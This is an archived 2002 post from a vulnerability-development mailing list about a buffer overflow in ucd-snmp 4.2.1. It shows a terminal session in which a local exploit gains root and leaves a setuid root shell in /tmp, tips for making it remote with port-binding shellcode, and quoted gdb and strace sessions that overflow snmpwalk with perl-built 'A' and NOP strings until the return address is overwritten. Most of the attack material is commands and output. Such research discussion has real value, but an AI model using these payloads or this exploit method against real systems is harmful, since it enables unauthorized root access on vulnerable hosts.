Vulnerability Development mailing list archives

Re: snmpd exploit examination - snmpwalk


From: The Itch <itchie () bse die ms>
Date: Fri, 22 Feb 2002 00:05:37 +0100 (CET)

Well, I did get positive results on a Slackware 8.0 box running ucd-snmpd 4.2.1

-----
itchie@napalm:~$ /usr/local/sbin/snmpd --version

UCD-snmp version:  4.2.1
Author:            Wes Hardaker
Email:             ucd-snmp-coders () ucd-snmp ucdavis edu

itchie@napalm:~$ ps -ax|grep snmpd
 3686 pts/0    S      0:00 /usr/local/sbin/snmpd
itchie@napalm:~$ ls -l /tmp/p00p
/bin/ls: /tmp/p00p: No such file or directory
itchie@napalm:~$ ls -l /tmp/rootshell*
/bin/ls: /tmp/rootshell*: No such file or directory
itchie@napalm:~$ ./snmpdex
Promisc Digital Research Group presents
a local exploit for ucd-snmp-4.2.1

Coded by The Itch
http://www.promisc.org

ps: leaves a rootshell in /tmp/rootshell
Timeout: No Response from 127.0.0.1
bash-2.05# id
uid=0(root) gid=0(root) groups=100(users)
bash-2.05# ls -l /tmp/rootshell
-rwsr-xr-x    1 root     root        13456 Feb 21 22:33 /tmp/rootshell
bash-2.05# ps -ax|grep snmp
bash-2.05#
-------------

You could make it remote too, by adjusting the shellcode to something
portbinding, however the problems that I encountered:
the length to crash snmpd must be exactly 256 bytes, one more or one less
will give no result.

The string however gets cut in half by snmpd so the only really
useful part is the first half which is about 144 bytes long.

have fun, 

-----
On Wed, 20 Feb 2002, KF wrote:

I am not so sure about those proof of concept remote snmp exploits that
were posted... they look more like local exploits to me.

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1 17 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l
/dev/null

(gdb) r  127.0.0.1 public `perl -e 'print "A" x 293'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x
293'`
Program received signal SIGSEGV, Segmentation fault.
0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
(gdb) bt
#0  0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
#1  0x0ff99358 in snmp_parse_oid () from /usr/lib/libsnmp-0.4.2.1.so
#2  0x10000e28 in _init ()
#3  0x0fc6eb90 in __libc_start_main () from /lib/libc.so.6

(gdb) r  127.0.0.1 public `perl -e 'print "A" x 308'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x
308'`
Program received signal SIGILL, Illegal instruction.
0x41414100 in ?? ()

(gdb) r  127.0.0.1 public `perl -e 'print "A" x 309'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'`
Program received signal SIGILL, Illegal instruction.
0x41414140 in ?? ()

This is snmpwalk NOT snmpd dying...

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1  5 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l
/dev/null

Still running...

OK, let's use a newer version of snmpwalk
[root@linuxppc ucd-snmp-4.2.2]# apps/snmpwalk 127.0.0.1 public `perl -e
'print "A" x 309'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA: Unknown Object Identifier
(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1  4 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l
/dev/null

still running...

These are the examples I have seen in various emails as methods to exploit
snmpd... These seem to do nothing on my box to the client or the daemon...

        snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`
        execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL);

execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL);

Here are my results.
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c `perl -e 'print
"A" x 256'`
Timeout: No Response from 127.0.0.1

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print
"\x90" x 450'`

Timeout: No Response from 127.0.0.1

[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 `perl -e
'print "A" x 4050'`
Timeout: No Response from 127.0.0.1

Additional findings.
[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 public `perl
-e 'print "A" x 4050'`
Segmentation fault

[root@linuxppc mail.snosoft.com]#  snmpwalk 127.0.0.1 -c public `perl -e
'print "A" x 4050'`
Segmentation fault

Meanwhile the daemon reads the requests with no problems...
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4,
"0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795),
sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238429, 731763}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4,
"0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795),
sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238430, 739274}, NULL) = 0

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print
"\x90" x 3999'`
Timeout: No Response from 127.0.0.1

[0fc5211c] recvfrom(4,
"0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795),
sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037
[0fc142b4] gettimeofday({1014238568, 885323}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4,
"0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795),
sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037

Give it too many chars and snmpwalk complains.
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print
"\x90" x 5000'`
snmpwalk: Error building ASN.1 representation

Again YOUR results may vary ... these are mine.

-KF 

Attachment: snmpdex.c
Description:
